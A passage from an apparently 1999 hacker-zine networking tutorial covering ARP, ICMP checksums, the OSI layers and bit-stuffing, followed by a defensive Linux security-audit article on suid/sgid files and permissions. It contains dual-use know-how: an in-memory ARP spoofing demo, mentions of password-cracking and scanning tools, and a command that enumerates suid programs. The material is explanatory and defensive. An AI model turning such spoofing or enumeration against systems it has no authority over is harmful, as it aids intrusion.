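    arp_pack(&req, wire);                              /* A -> broadcast */
    if (!arp_parse(wire, sizeof wire, &seen) || seen.oper != ARP_REQUEST) return -99;
    reply = seen;                                      /* B builds the answer */
    reply.oper = ARP_REPLY;
    memcpy(reply.tha, seen.sha, 6); memcpy(reply.tpa, seen.spa, 4);
    memcpy(reply.spa, seen.tpa, 4); memcpy(reply.sha, b_mac, 6);
    arp_pack(&reply, wire);                            /* B -> A */
    if (!arp_parse(wire, sizeof wire, &seen)) return -99;
    if (memcmp(seen.tha, a_mac, 6) != 0) return -99;   /* A checks it is addressed to A */
    return arp_learn(&seen);
}

/* An unsolicited reply from a third MAC claiming to be 10.0.0.2. */
static int arp_spoof_demo(void)
{
    arp_t fake = { 1, 0x0800, 6, 4, ARP_REPLY,
                   {0x02,0,0,0,0,0x66}, {10,0,0,2}, {0x02,0,0,0,0,0x01}, {10,0,0,1} };
    return arp_learn(&fake);
}

int main(void)
{
    printf("genuine reply: %d (1 = learned)\n", arp_exchange_demo());
    printf("repeat:        %d (0 = confirmed)\n", arp_exchange_demo());
    printf("spoofed reply: %d (-1 = conflicts with cache)\n", arp_spoof_demo());
    return 0;
}
```

A real stack simply overwrites the entry, which is the whole problem; the conflict return here is the kind of check a monitoring tool adds on top.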
Internet Control Message Protocol (ICMP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ICMP is another of the maintenance protocols. It allows two systems on an IP
network to share status and error info. This information is often used by
network admins to detect network trouble or recover from transmission
problems. ICMP messages are carried inside IP packets and are not really
considered to be a higher-level protocol.
The 'ping' utility uses the ICMP echo request and echo reply packets to
determine whether a particular IP system on a network is functional. Because
of this, the ping utility is useful for diagnosing IP network or router
failures.
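The checksum each of the TCP, UDP, IP and ICMP sections mentions is the same one, the RFC 1071 Internet checksum. This added example in C (not from the original article) implements and verifies it, checks it against the worked sample in the RFC, and then builds a constructed ping (IPv4 header plus ICMP echo request, addresses made up for the demo) to show the practical consequence of the IP section: the IP header checksum does not notice damaged data, the ICMP one does.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* RFC 1071 Internet checksum, as used by the IPv4 header, ICMP, TCP and UDP:
 * ones'-complement sum of the data as 16-bit big-endian words (an odd final
 * byte is padded with a zero), end-around carries folded back in, and the
 * result complemented. */
static uint16_t inet_checksum(const uint8_t *p, size_t n)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < n; i += 2) sum += (uint32_t)((p[i] << 8) | p[i + 1]);
    if (n & 1) sum += (uint32_t)(p[n - 1] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Verification: summing a block that carries its own checksum yields 0. */
static int inet_checksum_ok(const uint8_t *p, size_t n) { return inet_checksum(p, n) == 0; }

/* The worked example from RFC 1071 section 3: the checksum comes out 0x220d. */
static const uint8_t rfc1071_sample[8] = {0x00,0x01,0xf2,0x03,0xf4,0xf5,0xf6,0xf7};

/* ICMP echo request (type 8, code 0): the checksum covers the whole message. */
static size_t build_icmp_echo(uint16_t id, uint16_t seq, const uint8_t *payload,
                              size_t plen, uint8_t *out, size_t cap)
{
    if (8 + plen > cap) return 0;
    out[0] = 8; out[1] = 0; out[2] = 0; out[3] = 0;   /* type, code, checksum 0 while summing */
    out[4] = (uint8_t)(id >> 8);  out[5] = (uint8_t)id;
    out[6] = (uint8_t)(seq >> 8); out[7] = (uint8_t)seq;
    memcpy(out + 8, payload, plen);
    uint16_t c = inet_checksum(out, 8 + plen);
    out[2] = (uint8_t)(c >> 8); out[3] = (uint8_t)c;
    return 8 + plen;
}

/* Minimal 20-byte IPv4 header. Its checksum covers the header ONLY, which is
 * why IP alone cannot tell you the data arrived intact. */
static void build_ipv4_header(uint8_t proto, const uint8_t src[4], const uint8_t dst[4],
                              size_t plen, uint8_t hdr[20])
{
    uint16_t total = (uint16_t)(20 + plen);
    memset(hdr, 0, 20);
    hdr[0] = 0x45;                                  /* version 4, header length 5 words */
    hdr[2] = (uint8_t)(total >> 8); hdr[3] = (uint8_t)total;
    hdr[8] = 64;                                    /* TTL */
    hdr[9] = proto;                                 /* 1 = ICMP, 6 = TCP, 17 = UDP */
    memcpy(hdr + 12, src, 4); memcpy(hdr + 16, dst, 4);
    uint16_t c = inet_checksum(hdr, 20);
    hdr[10] = (uint8_t)(c >> 8); hdr[11] = (uint8_t)c;
}

/* Constructed ping from 10.0.0.1 to 10.0.0.2. Returns 1 when both checksums
 * verify on the freshly built packet AND a single flipped payload bit is
 * caught by the ICMP checksum while the IP header checksum still passes. */
static int ping_checksum_demo(void)
{
    static const uint8_t src[4] = {10,0,0,1}, dst[4] = {10,0,0,2};
    uint8_t pkt[64];
    size_t n = build_icmp_echo(0x1234, 1, (const uint8_t *)"f41th", 5, pkt + 20, sizeof pkt - 20);
    if (n == 0) return 0;
    build_ipv4_header(1, src, dst, n, pkt);
    if (!inet_checksum_ok(pkt, 20) || !inet_checksum_ok(pkt + 20, n)) return 0;
    pkt[20 + 8] ^= 0x01;                            /* one payload bit damaged in transit */
    return inet_checksum_ok(pkt, 20) && !inet_checksum_ok(pkt + 20, n);
}

int main(void)
{
    printf("RFC 1071 sample: 0x%04x (expect 0x220d)\n", inet_checksum(rfc1071_sample, 8));
    printf("ping demo: %d\n", ping_checksum_demo());
    return 0;
}
```

Like the parity and block checksums earlier, this one is an accident detector only: whoever can change the bytes can recompute it, so any TCP or UDP payload that needs integrity against an attacker needs a cryptographic check on top.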
The ISO OSI seven-layer Model
--oOo------------------------
The seven layers of the Open Systems Interconnection (OSI) model are shown in
my diagram below. The reason for the model was to try and introduce some
standardisation into the protocols of network communication.
The left part of the table lists the services people actually use, the
protocol that provides each one and the port it is usually found on. In OSI
terms all of that sits in layer 7 (the port number is really a layer 4
address, but it is the handle people remember), so the table groups those
three columns together and puts the lower layers beside them:
| Application (7)                              | Transport (4) | Network (3) | Data Link (2) | Physical (1)  |
| Service       | Protocol | Port              |               |             |               |               |
|---------------|----------|-------------------|---------------|-------------|---------------|---------------|
| Email         | SMTP     | 25                | TCP           | IPv4 / IPv6 | SLIP, PPP     | RS-x serial   |
|               | POP3     | 110               | TCP           |             |               | ISDN          |
| Newsgroups    | NNTP     | 119               | TCP           |             |               | ADSL          |
| Web           | HTTP     | 80                | TCP           |             |               | ATM           |
| File transfer | FTP      | 21 ctrl / 20 data | TCP           |             |               |               |
| Host sessions | Telnet   | 23                | TCP           |             | 802.2 SNAP    | FDDI          |
| Directory     | DNS      | 53                | UDP and TCP   |             |               | CAT 1-5       |
|  Network mgt. | SNMP     | 161 / 162         | UDP           |             | Ethernet II   | Coaxial cable |
| File services | NFS      | RPC, portmap 111  | UDP or TCP    |             |               |               |
|---------------|----------|-------------------|---------------|-------------|---------------|---------------|
By looking at the model in this way you will probably find that you are
familiar with the concept even if you have never seen it before, as most
people know at the very least things like port 80 is for HTTP and 23 for
Telnet etc.
The OSI model was introduced to describe how messages should be transmitted
between two computers on a network so that product implementors could produce
products that would consistently work with each other. The idea is that only
the physical layer actually moves bits between machines; each layer above it
talks to the same layer at the other end by handing data down through the
layers below. An intermediate host that is not the target only takes a
message up as far as it needs to (the network layer, for a router) and then
passes it on. The top four layers (4,5,6,7) are known as the 'upper layers'
and the bottom three layers (1,2,3) are known as the 'lower layers'. The
upper layers are only involved on the two end systems; the lower layers are
involved on every host a message passes through.
Layer 7: Application Layer
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the layer at which communication partners are identified, quality of
service is identified, user authenticity and privacy are considered, and any
constraints on data syntax are identified. These are /not/ the actual
applications themselves, but having said that, some applications perform
application layer functions.
Layer 6: Presentation Layer
~~~~~~~~~~~~~~~~~~~~~~~~~~~
This layer is usually a part of the operating system. It converts incoming
and outgoing data from one presentation format to another ie. ASCII to
EBCDIC. It is sometimes called the syntax layer. It also handles encryption
and compression of data.
Layer 5: Session Layer
~~~~~~~~~~~~~~~~~~~~~~
This layer basically sets up, co-ordinates and terminates conversations,
exchanges and dialogs between the application at each end. It deals with
session and connection co-ordination. It allows application processes to
register unique addresses, such as NetBIOS names. It also has some other
support functions including user authentication and resource-access security.
Layer 4: Transport Layer
~~~~~~~~~~~~~~~~~~~~~~~~
This layer manages the end-to-end control ie: determining whether all packets
have arrived. It also deals with error checking to ensure complete data
transfer.
Layer 3: Network Layer
~~~~~~~~~~~~~~~~~~~~~~
This layer handles the routing of the data ie: sending it in the right
direction to the right destination on outgoing transmissions and receiving
incoming transmissions at the packet level. It basically deals with routing
and forwarding. It controls subnet traffic to allow intermediate systems to
instruct a sending station not to transmit its frame when the router's buffer
is full. If the router is busy, the network layer can instruct the sending
station to use an alternate router.
Layer 2: Data Link Layer
~~~~~~~~~~~~~~~~~~~~~~~~
This layer provides error control and synchronisation for the physical level
and does bit-stuffing: after five consecutive 1 bits in the data it inserts a
0, so that the frame-delimiter pattern 01111110 can never occur inside the
data. It furnishes 'transmission protocol' knowledge and management. It
establishes and terminates a logical link (virtual-circuit connection)
between two computers identified by their unique network interface card (NIC)
addresses.
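Bit-stuffing as an added example in C, not from the original article: the sender's rule (a 0 after every five consecutive 1s) and the receiver's reverse, run on a constructed bit pattern that is itself identical to the HDLC flag.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* HDLC-style bit stuffing, one bit per array element (0 or 1) for clarity.
 * Sender: after five consecutive 1 bits insert a 0, so that the frame flag
 * 01111110 can never appear inside the data. Returns the stuffed length, or
 * 0 if `out` is too small. */
static size_t bit_stuff(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    size_t o = 0;
    int ones = 0;
    for (size_t i = 0; i < n; i++) {
        if (o >= cap) return 0;
        out[o++] = in[i];
        ones = in[i] ? ones + 1 : 0;
        if (ones == 5) {                 /* five 1s in a row: stuff a 0 */
            if (o >= cap) return 0;
            out[o++] = 0;
            ones = 0;
        }
    }
    return o;
}

/* Receiver: a 0 right after five 1s is stuffing and is dropped. Five 1s
 * followed by a 1 cannot be data (it is a flag or an abort), so that is
 * reported as a framing error by returning 0. */
static size_t bit_unstuff(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    size_t o = 0;
    int ones = 0;
    for (size_t i = 0; i < n; i++) {
        if (ones == 5) {
            if (in[i] == 1) return 0;
            ones = 0;
            continue;
        }
        if (o >= cap) return 0;
        out[o++] = in[i];
        ones = in[i] ? ones + 1 : 0;
    }
    return o;
}

/* Does the flag pattern 01111110 occur anywhere in the bit stream? */
static int contains_flag(const uint8_t *bits, size_t n)
{
    static const uint8_t flag[8] = {0,1,1,1,1,1,1,0};
    for (size_t i = 0; i + 8 <= n; i++)
        if (memcmp(bits + i, flag, 8) == 0) return 1;
    return 0;
}

/* Constructed sample: data that happens to look exactly like a flag. Returns
 * the stuffed length when the stuffed stream contains no flag and unstuffing
 * reproduces the input, otherwise -1. */
static int stuff_demo(void)
{
    static const uint8_t data[8] = {0,1,1,1,1,1,1,0};
    uint8_t stuffed[16], back[16];
    size_t s = bit_stuff(data, 8, stuffed, sizeof stuffed);
    if (s == 0 || contains_flag(stuffed, s)) return -1;
    size_t b = bit_unstuff(stuffed, s, back, sizeof back);
    if (b != 8 || memcmp(back, data, 8) != 0) return -1;
    return (int)s;                                 /* 9: one stuffed 0 */
}

/* How long does a run of k consecutive 1 bits become after stuffing? */
static int stuffed_len_of_ones(int k)
{
    uint8_t in[64], out[80];
    if (k < 0 || k > 64) return -1;
    for (int i = 0; i < k; i++) in[i] = 1;
    return (int)bit_stuff(in, (size_t)k, out, sizeof out);
}

int main(void)
{
    printf("flag-like data: %d bits after stuffing\n", stuff_demo());
    printf("eleven 1s: %d bits after stuffing\n", stuffed_len_of_ones(11));
    return 0;
}
```

The worst case is all-ones data, which grows by one bit in every five; that is the price for being able to find frame boundaries without a length field.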
Layer 1: Physical Layer
~~~~~~~~~~~~~~~~~~~~~~~
This layer conveys the bit-stream through the network at the electrical and
mechanical level. It provides the hardware means of sending and receiving
data on a carrier. Data-encoding modifies the digital-signal pattern (1s and
0s) used by the computer to better accommodate the characteristics of the
physical medium and to assist in bit and frame synchronisation. Data-encoding
resolves which signal pattern represents a binary 1, how the receiving
station recognises when a 'bit-time' starts and how the receiving station
delimits a frame.
Bridges and Gateways/Routers
--oOo-----------------------
A bridge is a connection between two local area networks. Wide area networks
may be connected through a system of routers/gateways, a gateway being a
computer which acts as a point of connection between different networks.
Shouts and Greetz
--oOo------------
The usual peeps:
Werd to the darkcyde collective, extra shouts to hybrid, bodie and force.
Also greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf,
downtime, kryptus. L8r.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Linux System Security ]::[OO--[ by zomba ]------------------------
-->]OO[::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]:::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]:::::::::::
*****************************************************************************
************************** D4RKCYDE present (1999) **************************
*****************************************************************************
--oOo--> Covered in this Article: ]-------------------
--oOo--> ---------------------------------------------
--oOo--> Introduction ]---
--oOo--> Thinking up a Security Audit ]---
--oOo--> Part 1: The Plan ]---
--oOo--> Part 2: The Tools ]---
--oOo--> Part 3: Knowledge Gathering ]---
--oOo--> suid and sgid ]---
--oOo--> How to find suid and sgid files ]---
--oOo--> Setting suid and sgid ]---
--oOo--> File and Directory Permissions ]---
--oOo--> : Files ]---
--oOo--> : Directories ]---
--oOo--> How suid and sgid fit into this picture ]---
--oOo--> The default mode for a file or directory ]---
--oOo--> Passwords: A second look ]---
--oOo--> Related WWW sites ]---
Introduction
--oOo-------
In this phile you will learn how to protect your box from those nasty hacker-
type people, which more often than not will be your online buddies :] When
you're thinking about your system security you have to remember that your
system is only as secure as its weakest point. Now, this is an old saying but
it has a lot of truth in it; it's like locking all your windows to stop
intruders but leaving the back door unlocked. Read on...
Thinking up a Security Audit
--oOo-----------------------
There are three basic parts to a security audit:
o--> The Plan - (ie: a set of security aspects to be evaluated)
o--> The Tools - (ie: what tools are available to you to assist
in evaluating the security aspects)
o--> Knowledge Gathering - (ie: finding out the ways in which your system
can be attacked; this includes physical security
issues, learning about the system itself and
much much more)
Part 1: The Plan
--oOo-----------
Now the plan doesn't really have to be anything more than a quick scribble on
a bit of paper that details what you are going to do. It should though,
revolve around two basic questions:
o--> What types of security problems could I have?
o--> Which ones can I attempt to fix?
In order to answer these questions, you may have to find out a bit more about
several areas of your system, these include:
o--> Accountability
o--> Change control and tracking
o--> Data integrity, including backups
o--> Physical security
o--> Privacy of Data
o--> System access
o--> System availability
Okay werd, so now you have a more detailed description of what you want to
achieve you can write up a more complex plan. As always, there will be trade-
offs. For example, privacy of data could mean that only certain people can
log into your box, which affects system access for the users. System
availability is always in contention with change control. For example,
when do you change that failing hard drive on a 24/7 system? What I'm trying
to get at here is that the detailed plan that is developed should include a
set of goals; a way of tracking the progression of the goals, including
changes to the system; and a knowledge base of what types of tools are needed
to do the job.
Part 2: The Tools
--oOo------------
Okay, so now you should have a fair idea of what you want to do; now you have
to think about *how* you are going to do it. A number of tewls are available
on the internet, including tools to check passwords, check system security,
and protect your system. CERT, CIAC, and the Linux Emergency Response Team
are often good sources of information for both the beginner and the advanced
sysadmin.
The following is a list of tools, all freely available if you look for them,
make sure you look around for some other tools as well though!
--> cops [ A set of programs; each checks a different aspect ]
[ of security on a *nix system. If any potential ]
[ security holes do exist, the results are either ]
[ mailed or saved to a report file. ]
--> crack [ A program designed to find passwords behind the ]
[ standard *nix DES-based crypt(3) hashes, by the usual ]
[ dictionary and rule-based guessing techniques. ]
--> deslogin [ A remote login program that can be used safely ]
[ across insecure networks. ]
--> findsuid.tar.Z [ Finds changes in setuid (set user ID) and setgid ]
[ (set group ID) files. ]
--> finger daemon [ Secure finger daemon for *nix. Should compile out-]
[ of-the-box nearly anywhere. ]
--> freestone [ A portable, fully functional firewall ]
[ implementation. ]
--> gabriel [ A satan detector. gabriel gives the sysadmin an ]
[ early warning of possible network intrusions by ]
[ detecting and identifying satan's network probe. ]
--> ipfilter [ A free packet filter that can be incorporated into ]
[ any of the supported operating systems, providing ]
[ IP packet-level filtering per interface. ]
--> ipfirewall [ An IP packet filtering tool, similar to the packet]
[ filtering facilities provided by most commercial ]
[ routers. ]
--> kerberos [ A network authentication system for use on ]
[ physically insecure networks. It allows entities ]
[ communicating over a network to prove their ]
[ identities to each other while preventing ]
[ eavesdropping or replay attacks. ]
--> merlin [ Takes a popular secur1ty tewl (such as tiger, ]
[ tripwire, cops, crack, or spi) and provides it ]
[ easy-to-use, consistent graphical interface, ]
[ simplifying and enhancing its capabilities. ]
--> npasswd [ passwd replacement with password sanity check. ]
--> obvious-pw.tar.Z [ An obvious password detector. ]
--> opie [ Provides a one-time password system for POSIX- ]
[ compliant UNIX-like operating systems. ]
--> pcheck.tar.Z [ Checks formats of /etc/passwd; verifies root ]
[ default shell and passwd fields. ]
--> Plugslot Ltd. [ PCP/PSP UNIX network security and configuration ]
[ monitor. ]
--> rsaeuro [ A cryptographic tewl-kit providing various ]
[ functions for the use of digital signatures, data ]
[ encryption, and supporting areas (PEM encoding, ]
[ random number generation, and so on). ]
--> rscan [ Allows sysadmins to execute complex (or simple) ]
[ scanner scripts on one (or many) machines and ]
[ create clean, formatted reports in either ASCII or]
[ HTML. ]
--> satan [ The secur1ty analysis tewl for auditing networks. ]
[ In its simplest (and default) mode, it gathers as ]
[ much information about remote hosts and networks ]
[ as possible by examining such network services ]
[ such as finger, NFS, NIS, ftp and tftp, rexd, and ]
[ many others. ]
--> ssh [ Secure shell - a remote login program. ]
--> tcp wrappers [ Monitor and control remote access to your local ]
[ tftp, exec, ftp, rsh, telnet, rlogin, finger and ]
[ systat daemon. ]
--> tiger [ Scans a system for potential secur1ty problems. ]
--> tis firewall toolkit [ Includes enhancements and bug fixes from V1.2, and]
[ new proxies for HTTP/Gopher and X11. ]
--> tripwire [ Monitors system for secur1ty break-in attempts. ]
--> xp-beta [ An application gateway of X11 protocol. It is ]
[ designed to be used at a site that has a firewall ]
[ and uses SOCKS and/or CERN WWW Proxy. ]
--> xroute [ Routes X packets from one machine to another. ]
All of the above tools will be available from my website:
members.xoom.com/phuk when it is finally finished and online.
Part 3: Knowledge Gathering
--oOo----------------------
There is not really that much to say about knowledge gathering other than to
make sure you find out whether or not the system users and the keepers of the
sacred root password (hopefully just yourself) all follow the security
procedures that you have put into place - and that they gather all the
knowledge necessary to do so. One of the major points of this is that you
don't use the same password for everything. For example, I know someone
whose password is a variation of his name; he uses this password for
*everything*: ISP accounts, web email services, he even used to spell it out
numerically for his VMB pass. If you do this now, then DON'T. It may be safe
to use as the root password because it is hard for someone to find it out, but
if they find out your pwd for something less secure that just happens to be
the same pass as root, then you are fux0red.
File secur1ty is another big issue. The use of umask (file creation masks)
should be mandated, and it should be set to the most restrictive value
possible. It is easy to change a particular file to give someone else access
to it; it is difficult, if not impossible, to know who is looking at your
files. The sensitivity of your data, of course, determines the exact level of
security placed on the file. In extremely sensitive cases, such as all your
h/p related files, the file should also be encrypted (make sure you use a
lengthy pass-word as well; mine is a 34 character sentence containing random
upper/lower case letters and numbers, which I have memorised).
It might also be a good idea to occasionally search for programs that have
suid or sgid capability.
suid and sgid
--oOo--------
Many people talk about suid (set user ID) and sgid (set group ID) without
really knowing that much about them. The basic concept behind them is that a
program (not a script) is set so that it runs as the owner or group set for
the program, not as the person running the program. For example, say you have
a program with suid set, and its owner is root. Anyone running that program
runs it with the permissions of the owner instead of his or her own
permissions. The passwd command is a good example of this. The file
/etc/passwd is writable by root, and readable by everyone. The passwd program
has suid turned on. Therefore, anyone can run the program and change their
password. Because the program is running as the user root, not the actual
user, the /etc/passwd file can be written to.
The same concept is true of sgid. Instead of the program running with the
permissions and authority of the group associated with the person calling the
program, the program is run with the permissions and authority of the group
that is associated with the program.
How to find suid and sgid files
--oOo--------------------------
Using the find command, you can search the entire system looking for programs
with their suid or sgid bit turned on. In octal the suid bit is 4000 and the
sgid bit is 2000; the escaped parentheses are needed so that -print applies
to both halves of the -o:
find / -type f \( -perm -4000 -o -perm -2000 \) -print
A good idea is to run the above command when you first load a system, saving
its output to a file readable only by root. Future searches can be performed
and compared to this "clean" list of suid and sgid files. This way you can
ensure that only the files that should have these permissions actually do.
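The baseline-and-compare idea above, as a small sh script. This is an added example, not code from the article or from findsuid.tar.Z; it assumes a POSIX find, sort and comm, uses the octal values 4000 (suid) and 2000 (sgid), and restricts itself to regular files so that sgid directories (normal for shared project dirs) do not clutter the list. The baseline is written with umask 077 so only its owner can read it.

```shell
#!/bin/sh
# Baseline-and-compare check for setuid/setgid programs (added example).
# suid is octal 4000 and sgid is octal 2000; -perm -4000 matches any file
# that has at least that bit set, whatever its other permissions are.

# list_privileged ROOT: every regular file under ROOT with suid or sgid set, sorted
list_privileged() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# record_baseline ROOT FILE: write the "clean" list to FILE, readable by owner only
record_baseline() {
    ( umask 077; list_privileged "$1" > "$2" )
}

# compare_baseline ROOT FILE: print NEW/GONE lines for each difference against
# the baseline; return 0 when nothing changed, 1 otherwise (handy from cron)
compare_baseline() {
    current=$(mktemp)
    list_privileged "$1" > "$current"
    # comm needs sorted input: -13 = only in current, -23 = only in baseline
    comm -13 "$2" "$current" | sed 's/^/NEW  /'
    comm -23 "$2" "$current" | sed 's/^/GONE /'
    changed=$(comm -3 "$2" "$current" | wc -l)
    rm -f "$current"
    [ "$changed" -eq 0 ]
}
```

Run record_baseline once right after installing the system (for the whole box, ROOT is / and FILE lives somewhere only root can read), then compare_baseline from cron. A NEW line is either a package you just installed or something you want to look at very closely.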
Setting suid and sgid
--oOo----------------
The set user ID and set group ID can be powerful tools for giving the users
the ability to perform tasks without the other problems that could arise with
the user having the actual permissions of that group or user. However, these
can be dangerous tools too. When considering changing the permissions on a
file to be either suid or sgid, keep in mind these two things:
o--> Use the lowest permissions needed to accomplish a task.
o--> Watch for back doors.
Using the lowest permissions means not giving a file an suid of root if at
all possible. Often, a less privileged user can be configured to do the
task. The same goes for sgid. Many times, setting the group to the
appropriate non-sys group will accomplish the same task while limiting other
potential problems.
Back doors/Trojans come in many forms. A program that allows a shell is a back
door. A program that has multiple entrances and exits is a back door. Keep in
mind that if a user can run an suid program set to root and the program
contains a back door (the user can get out of the program to a prompt without
actually exiting the program), then the process keeps the effective user ID
the program is set to (ie: root), and the user now has root permissions.
With that said, how do you set a file to have the effective user be the owner of
the file, or the effective group be the group of the file, instead of running as
the user ID or the users group ID of the person invoking the file? The
permissions are added with the chmod command, as follows:
chmod u+s file(s)
chmod g+s file(s)
The first example sets suid for the file(s) listed. The second example sets
the sgid of the file(s) listed. Remember, suid sets the effective user ID of
the process to the owner associated with the file, and sgid sets the effective
group ID of the process to the group associated with the file. These cannot
be set on non-executables.
File and Directory Permissions
--oOo-------------------------
File and directory permissions are the basics for providing security on a
system. These, along with the authentication system, provide the basis for
all security. Unfortunately, many people do not know what permissions on
directories mean, or they assume they mean the same thing they do on files.
The following section describes the permissions on files; after that, the
permissions on directories are described.
Files
--o--
The permissions for files are split into three different sections: the owner
of the file, the group associated with the file, and everyone else
(the w0rld). Each section has its own set of file permissions. These
permissions provide the ability to read, write, and execute (or, of course,
to deny the same). These permissions are called a file's 'filemode'. Filemodes
are set with the chmod command.
There are two ways to specify the permissions of the object. You can use the
numeric coding system or the letter coding system. Using the letter coding
system, the three sections are referred to as 'u' for user, 'g' for group, and 'o'
for other, or 'a' for all three. There are three basic types of permissions:
'r' for read, 'w' for write, and 'x' for execute. Combinations of r, w and x
with the three groups provide the permissions for files. In the following
example, the owner of the file (me) has read, write, and execute permissions,
while everyone else has read access only.
shell:/home/zomba$ ls -l 0d4yz
-rwxr--r-- 1 zomba users 10 May 21 48:32 0d4yz
The command ls -l tells the computer to give you a long (-l) listing (ls) of
the file (0d4yz). The resulting line is shown in the second code line, and it
tells you a number of things about the file. First, it tells you the
permissions. Next it tells you how many links the file has. It then tells you
who owns the file (zomba) and what group is associated with the file (users).
Following the ownership section, the date and timestamp for the last time the
file was modified is given. Finally, the name of the file is listed (0d4yz).
The permissions are actually made up of four sections. The first section is a
single character that identifies the type of object that is listed out, these
can be:
- Plain File
b Block special file
c Character special file
d Directory
l Symbolic link
p Named pipe
s Socket
Following the file type identifier are the three sets of permissions: rwx
(owner), r-- (group), r-- (other).
Directories
----oo-----
The permissions on a directory are the same as those used by files: read, write
and execute. The actual permissions, though, mean different things. For a
directory, read access provides the ability to list the names of the files in
that directory. It does not allow the other attributes to be seen (owner,
group, size, and so on). Write access provides the ability to alter the
directory contents. This means that the user could create and delete files in
the directory. Finally, execute access lets the user make the directory the
current directory.
As I stated earlier, the permissions can also be manipulated with a numeric
coding system. The basic concept is the same as the letter coding system. As
a matter of fact, the permissions look exactly alike. The difference is the
way the permissions are identified. The numeric system uses binary counting
to determine the value for each permission and sets them. Also, the find
command can accept the permissions as an argument using the -perm option. In
this case, the permissions must be given in their numeric form.
With binary, you count from the right to the left. Therefore, if you look at
a file, you can easily come up with its numeric coding system value. The
following file has full permissions for the owner and read permissions for
the group and the world:
shell:/home/zomba$ ls -la 0clue
-rwxr--r-- 1 zomba users 10 May 22 00:12 0clue
This would be coded as 744, the table below shows how this was formed.
Permission Value
Read 4
Write 2
Execute 1
Permissions use an additive (if that's a word) process. Therefore, a person
with read, write, and execute permissions to a file would have 7 (4+2+1).
Read and execute would have a value of 5. Remember, there are three sets of
values, so each section would have its own value. The following table shows
both the numeric system and the character system for the permissions:
Permission Numeric Character
Read-only 4 r--
Write-only 2 -w-
Execute-only 1 --x
Read and write 6 rw-
Read and execute 5 r-x
Read, write and execute 7 rwx
Permissions can be changed using the chmod command. With the numeric system,
the chmod command must be given the value of all three fields. Therefore, to
change a file to read, write, and execute by everyone, the following command
would be issued:
$ chmod 777 <filename>
To perform the same task with the character system, the following command
would be issued:
$ chmod a+rwx <filename>
Of course, more than one type of permission can be specified at any one time. The
following command adds write access for the owner of the file, and adds read
and execute access to the group and everyone else:
$ chmod u+w,og+rx <filename>
The advantage that the character system provides is that you do not have to
know what the previous permissions are. You can selectively add or remove
permissions without worrying about the rest. With the numeric system, each
section of users must always be specified. The downside of the character
system is when complex changes are being made. Looking at the preceding
example (chmod u+w,og+rx <filename>), it might have been easier to use the
numeric system and replace all those letters with three numbers: 755.
How suid and sgid fit into this picture
--oOo----------------------------------
The special purpose access modes suid and sgid add an extra character to the
picture. Before looking at what a file looks like with the different special
access modes, take a look at the table below for the identifying characters
for each of the modes.
Code Name Meaning
s suid Sets process user ID on execution
s sgid Sets process group ID on execution
suid and sgid are used on executables. Therefore, the code is placed where
the code for the executable would normally go. The following file has suid
set:
$ ls -la w0rd
-rwsr--r-- 1 zomba users 10 May 22 00:22 w0rd
The difference between the suid being set and the sgid being set is the
placement of the code. The same file with sgid active would look like this:
$ ls -la w0rd
-rwxr-sr-- 1 zomba users 10 May 22 00:22 w0rd
To set the suid with the character system, the following command would be
executed:
$ chmod u+s <filename>
To set the sgid with the character system, the following command would be
executed:
$ chmod g+s <filename>
To set the suid and the sgid using the numeric system, you add a fourth digit
in front of the usual three: 4 for suid and 2 for sgid, so you will have to
use these two commands:
$ chmod 4### <filename>
$ chmod 2### <filename>
In both instances, the ### is replaced with the rest of the values for the
permissions. The additive process is used to combine permissions; therefore,
the following command would add suid and sgid to a file:
$ chmod 6### <filename>
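To tie the last two sections together (the additive numeric system and the s/S/t characters in the ls -l column), here is an added example in sh, not from the article: a converter between the nine-character permission string and the four-digit octal value chmod accepts, in both directions. It also handles what the text does not show: a capital S or T in the listing means the special bit is set while the matching execute bit is off, which on a program is almost always a mistake worth spotting.

```shell
#!/bin/sh
# Convert between the ls -l permission string and the octal value chmod takes
# (added example). s in the owner column is suid (4), s in the group column is
# sgid (2), t in the other column is sticky (1). A capital S or T means the
# special bit is set but the execute bit underneath it is not.

# mode_to_octal MODESTRING: 'rwsr-sr--' (or the ten-column '-rwsr-sr--') -> 6754
mode_to_octal() {
    s=$1
    [ ${#s} -eq 10 ] && s=${s#?}          # drop the file-type column if present
    [ ${#s} -eq 9 ] || { echo "bad mode string: $1" >&2; return 1; }
    u=${s%??????}; rest=${s#???}; g=${rest%???}; o=${rest#???}
    sp=0; d1=0; d2=0; d3=0
    case $u in r??) d1=$((d1+4));; esac
    case $u in ?w?) d1=$((d1+2));; esac
    case $u in ??[xs]) d1=$((d1+1));; esac
    case $u in ??[sS]) sp=$((sp+4));; esac    # suid
    case $g in r??) d2=$((d2+4));; esac
    case $g in ?w?) d2=$((d2+2));; esac
    case $g in ??[xs]) d2=$((d2+1));; esac
    case $g in ??[sS]) sp=$((sp+2));; esac    # sgid
    case $o in r??) d3=$((d3+4));; esac
    case $o in ?w?) d3=$((d3+2));; esac
    case $o in ??[xt]) d3=$((d3+1));; esac
    case $o in ??[tT]) sp=$((sp+1));; esac    # sticky
    printf '%s%s%s%s\n' "$sp" "$d1" "$d2" "$d3"
}

# triplet_chars DIGIT SPECIAL CHAR: one rwx triplet; a non-zero SPECIAL puts
# CHAR (s or t) in the execute position, upper-cased when execute itself is off
triplet_chars() {
    r=-; w=-; x=-
    [ $(( $1 & 4 )) -ne 0 ] && r=r
    [ $(( $1 & 2 )) -ne 0 ] && w=w
    [ $(( $1 & 1 )) -ne 0 ] && x=x
    if [ "$2" -ne 0 ]; then
        if [ "$x" = x ]; then x=$3; else case $3 in s) x=S;; t) x=T;; esac; fi
    fi
    printf '%s%s%s' "$r" "$w" "$x"
}

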